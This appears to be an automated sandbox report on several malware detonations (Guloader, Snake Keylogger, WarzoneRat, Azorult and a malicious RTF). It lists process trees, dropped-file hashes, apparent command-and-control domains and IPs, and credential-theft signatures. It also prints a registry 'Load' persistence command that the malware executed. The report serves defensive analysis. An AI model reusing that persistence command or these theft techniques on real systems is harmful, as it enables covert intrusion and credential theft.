Platform
win10v20210410
Max time kernel
14s
Max time network
154s
Command Line
Signatures
Guloader,Cloudeye
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe
"C:\Users\Admin\AppData\Local\Temp\42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe"
Network
Files
memory/744-116-0x0000000002F00000-0x0000000002F13000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
5s
Max time network
45s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\70d5a71e821c8024fa2d5fb8a389390acc1289b88745fad61b6536cab0bd5191.dll,#1
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210410
Max time kernel
116s
Max time network
139s
Command Line
Signatures
Snake Keylogger
WarzoneRat, AveMaria
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\.GobDsGtn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 680 set thread context of 3464 | N/A | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe |
| PID 4012 set thread context of 2268 | N/A | C:\ProgramData\images.exe | C:\Users\Admin\AppData\Local\Temp\images.exe |
| PID 4000 set thread context of 1936 | N/A | C:\Users\Admin\AppData\Roaming\.GobDsGtn.exe | C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\images.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\.GobDsGtn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
"C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe"
C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
C:\Users\Admin\AppData\Local\Temp\71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Users\Admin\AppData\Roaming\.GobDsGtn.exe
"C:\Users\Admin\AppData\Roaming\.GobDsGtn.exe"
C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe
C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe
C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe
C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | sdafsdffssffs.ydns.eu | udp |
| N/A | 203.159.80.107:6703 | sdafsdffssffs.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | hutyrtit.ydns.eu | udp |
| N/A | 203.159.80.107:80 | hutyrtit.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | checkip.dyndns.org | udp |
| N/A | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| N/A | 8.8.8.8:53 | freegeoip.app | udp |
| N/A | 104.21.19.200:443 | freegeoip.app | tcp |
Files
memory/680-114-0x0000000000910000-0x0000000000911000-memory.dmp
memory/680-116-0x0000000005630000-0x0000000005631000-memory.dmp
memory/680-117-0x0000000005210000-0x0000000005211000-memory.dmp
memory/680-118-0x0000000005370000-0x0000000005371000-memory.dmp
memory/680-119-0x0000000005130000-0x000000000562E000-memory.dmp
memory/680-120-0x00000000071F0000-0x000000000723C000-memory.dmp
memory/680-121-0x00000000072C0000-0x00000000072C1000-memory.dmp
memory/680-126-0x0000000008C90000-0x0000000008CF3000-memory.dmp
memory/680-127-0x0000000008D70000-0x0000000008D71000-memory.dmp
memory/680-128-0x0000000005130000-0x000000000562E000-memory.dmp
memory/3464-129-0x0000000000400000-0x000000000055E000-memory.dmp
memory/3464-130-0x0000000000405E28-mapping.dmp
memory/3464-131-0x0000000000400000-0x000000000055E000-memory.dmp
memory/1020-132-0x0000000000000000-mapping.dmp
memory/4012-133-0x0000000000000000-mapping.dmp
C:\ProgramData\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
C:\ProgramData\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
memory/1604-140-0x0000000000000000-mapping.dmp
memory/4012-142-0x0000000004BC0000-0x0000000004BC1000-memory.dmp
memory/4012-151-0x0000000004BC3000-0x0000000004BC5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
memory/2268-155-0x0000000000405E28-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
memory/2268-157-0x0000000000400000-0x000000000055E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 44020c86a10168041f6ddde52fd3f4d4 |
| SHA1 | 0dc9cf42fb0b5670d54307c9eb41cbc43bd66454 |
| SHA256 | 71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386 |
| SHA512 | 163de8e93558e30b09f6a89dd3be3627c9fbd076ba28001b19db0efc9e33bf6ed4b1ba62d63d29403af4c7c9108b92bcb9ea0aa0978023d3398a36534049683b |
memory/3880-159-0x0000000000000000-mapping.dmp
memory/3880-160-0x00000000002E0000-0x00000000002E1000-memory.dmp
memory/2268-161-0x0000000004160000-0x000000000429C000-memory.dmp
memory/4000-162-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\.GobDsGtn.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Roaming\.GobDsGtn.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/4000-165-0x0000000000B30000-0x0000000000B31000-memory.dmp
memory/4000-170-0x0000000005310000-0x000000000580E000-memory.dmp
memory/4000-171-0x0000000008710000-0x000000000875A000-memory.dmp
memory/4000-176-0x0000000008A30000-0x0000000008AA2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/1936-178-0x0000000000400000-0x0000000000426000-memory.dmp
memory/1936-179-0x000000000042010E-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\.GobDsGtn.exe.log
| MD5 | 9e7845217df4a635ec4341c3d52ed685 |
| SHA1 | d65cb39d37392975b038ce503a585adadb805da5 |
| SHA256 | d60e596ed3d5c13dc9f1660e6d870d99487e1383891437645c4562a9ecaa8c9b |
| SHA512 | 307c3b4d4f2655bdeb177e7b9c981ca27513618903f02c120caa755c9da5a8dd03ebab660b56108a680720a97c1e9596692490aede18cc4bd77b9fc3d8e68aa1 |
C:\Users\Admin\AppData\Local\Temp\.GobDsGtn.exe
| MD5 | 50c12d57dba3671ee37e90ef48c113cb |
| SHA1 | 1478f7311bda81efc961811c2d2f28a782f7dc44 |
| SHA256 | 3b1c4fb3ad9793fe6347978b9a5b399d0ef84ad25c11ea191d217cd173b6a05d |
| SHA512 | 1a2f3fa86c747413867f74640d9d0219ba25aa5619b52d88c05dfdaecf1fa7e211e760914227995c8b55be72fecc02b26b23b38fbb655014d4e6e7c643749c6d |
memory/1936-186-0x0000000004E90000-0x0000000004E91000-memory.dmp
memory/1936-187-0x0000000004DF0000-0x00000000052EE000-memory.dmp
memory/1936-189-0x00000000060F0000-0x00000000060F1000-memory.dmp
memory/1936-191-0x00000000066C0000-0x00000000066C1000-memory.dmp
memory/2268-192-0x0000000004A50000-0x0000000004AD4000-memory.dmp
\Users\Admin\AppData\Local\Temp\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
\Users\Admin\AppData\Local\Temp\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
\Users\Admin\AppData\Local\Temp\mozglue.dll
| MD5 | 75f8cc548cabf0cc800c25047e4d3124 |
| SHA1 | 602676768f9faecd35b48c38a0632781dfbde10c |
| SHA256 | fb419a60305f17359e2ac0510233ee80e845885eee60607715c67dd88e501ef0 |
| SHA512 | ed831c9c769aef3be253c52542cf032afa0a8fa5fe25ca704db65ee6883c608220df7102ac2b99ee9c2e599a0f5db99fd86894a4b169e68440eb1b0d0012672f |
\Users\Admin\AppData\Local\Temp\nss3.dll
| MD5 | d7858e8449004e21b01d468e9fd04b82 |
| SHA1 | 9524352071ede21c167e7e4f106e9526dc23ef4e |
| SHA256 | 78758bf7f3b3b5e3477e38354acd32d787bc1286c8bd9b873471b9c195e638db |
| SHA512 | 1e2c981e6c0ca36c60c6e9cae9548b866d5c524df837095b30d618d9c322def7134c20de820105400dd1b58076b66d90274f67773ac6ba914f611b419babb440 |
\Users\Admin\AppData\Local\Temp\softokn3.dll
| MD5 | 471c983513694ac3002590345f2be0da |
| SHA1 | 6612b9af4ff6830fa9b7d4193078434ef72f775b |
| SHA256 | bb3ff746471116c6ad0339fa0522aa2a44a787e33a29c7b27649a054ecd4d00f |
| SHA512 | a9b0fb923bc3b567e933de10b141a3e9213640e3d790b4c4d753cf220d55593ae8026102909969ba6bfc22da3b2fcd01e30a9f5a74bd14a0fdec9beaf0fb1410 |
\Users\Admin\AppData\Local\Temp\freebl3.dll
| MD5 | ef12ab9d0b231b8f898067b2114b1bc0 |
| SHA1 | 6d90f27b2105945f9bb77039e8b892070a5f9442 |
| SHA256 | 2b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7 |
| SHA512 | 2aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193 |
Analysis: behavioral5
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210408
Max time kernel
22s
Max time network
125s
Command Line
Signatures
Azorult
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 568 set thread context of 3796 | N/A | C:\Users\Admin\AppData\Local\Temp\219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe | C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe
"C:\Users\Admin\AppData\Local\Temp\219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe"
C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | cskbtr.atspace.co.uk | udp |
| N/A | 185.176.43.84:80 | cskbtr.atspace.co.uk | tcp |
Files
memory/568-114-0x00000000005F0000-0x00000000005F1000-memory.dmp
memory/568-116-0x00000000053E0000-0x00000000053E1000-memory.dmp
memory/568-117-0x0000000004EE0000-0x0000000004EE1000-memory.dmp
memory/568-118-0x0000000004E80000-0x0000000004E81000-memory.dmp
memory/568-119-0x0000000004E20000-0x0000000004E21000-memory.dmp
memory/568-120-0x0000000005110000-0x0000000005111000-memory.dmp
memory/3796-122-0x000000000041A684-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
| MD5 | dd0ee56841e535a3a3ae7c20c32de9cd |
| SHA1 | fc1ea172fd3c67a00e37f930f7595784fc0d1f84 |
| SHA256 | 8649df38276968d1417ec064360339610ff644491c87eb8ac2b2e67e7cbe47c9 |
| SHA512 | ee6a7982e194a5a24f5bd596d1ad6582defcababa19ea8011ba71ead2ee8945dce9f5af56e47b088c16ca00cb6c7225cc18b9b6f026e623283c0e02f9bed524e |
memory/3796-121-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
| MD5 | dd0ee56841e535a3a3ae7c20c32de9cd |
| SHA1 | fc1ea172fd3c67a00e37f930f7595784fc0d1f84 |
| SHA256 | 8649df38276968d1417ec064360339610ff644491c87eb8ac2b2e67e7cbe47c9 |
| SHA512 | ee6a7982e194a5a24f5bd596d1ad6582defcababa19ea8011ba71ead2ee8945dce9f5af56e47b088c16ca00cb6c7225cc18b9b6f026e623283c0e02f9bed524e |
memory/3796-125-0x0000000000400000-0x0000000000420000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210410
Max time kernel
150s
Max time network
154s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2551719852-3230894977-3211800512-1466436719-3983687911-3636005082-2304353340 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_20df\Children | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_20df | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2551719852-3230894977-3211800512-1466436719-3983687911-3636005082-2304353340\Moniker = "oice_16_974fa576_32c1d314_20df" | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2551719852-3230894977-3211800512-1466436719-3983687911-3636005082-2304353340\Children | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_20df | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPCONTAINER\STORAGE\OICE_16_974FA576_32C1D314_20DF\CHILDREN | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_CLASSES\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPCONTAINER\MAPPINGS\S-1-15-2-2551719852-3230894977-3211800512-1466436719-3983687911-3636005082-2304353340\CHILDREN | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key created | \Registry\User\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2551719852-3230894977-3211800512-1466436719-3983687911-3636005082-2304353340 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2551719852-3230894977-3211800512-1466436719-3983687911-3636005082-2304353340\DisplayName = "OICE_16_974FA576_32C1D314_20DF" | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\{A8E66957-32CD-4406-B0B7-F3D3FA03E52B}\abdtfhghgdghghœ.ScT:Zone.Identifier | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 364 wrote to memory of 3904 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE |
| PID 364 wrote to memory of 3904 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\52969fae09c2428c701a8b51a20c1eb07bab1bca79acb21eaa910d764533155d.rtf" /o ""
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE
"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE" C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
Network
Files
memory/364-114-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
memory/364-115-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
memory/364-116-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
memory/364-117-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
memory/364-119-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
memory/364-118-0x00007FFDC44E0000-0x00007FFDC7003000-memory.dmp
memory/364-122-0x00007FFDBDFC0000-0x00007FFDBF0AE000-memory.dmp
memory/364-123-0x00007FFDBC0C0000-0x00007FFDBDFB5000-memory.dmp
memory/3904-316-0x0000000000000000-mapping.dmp
memory/3904-326-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
memory/3904-329-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
memory/3904-332-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\oice_16_974fa576_32c1d314_20df\AC\Temp\FL4433.tmp
| MD5 | dc463992c2f659be85d40eb3b8991b4b |
| SHA1 | 6de672e23630e3d58225a77b9d09dd70df680947 |
| SHA256 | fcfd5799afb5acc6cab4737f03a3583f8cf94073f498cdca7a4bf8c9cd1fb340 |
| SHA512 | 959b6f6ccb190f5bf1cd3f6a68e0b151b9dc6d3247104423ff0cba5fdf9c529999419865cdab96bdd9c56c19cea80ac0c2753fca7dd5671d8d7c028df183d0e6 |
memory/3904-361-0x00007FFDA2790000-0x00007FFDA27A0000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:34
Platform
win7v20210408
Max time kernel
131s
Max time network
199s
Command Line
Signatures
Snake Keylogger
WarzoneRat, AveMaria
Downloads MZ/PE file
Executes dropped EXE
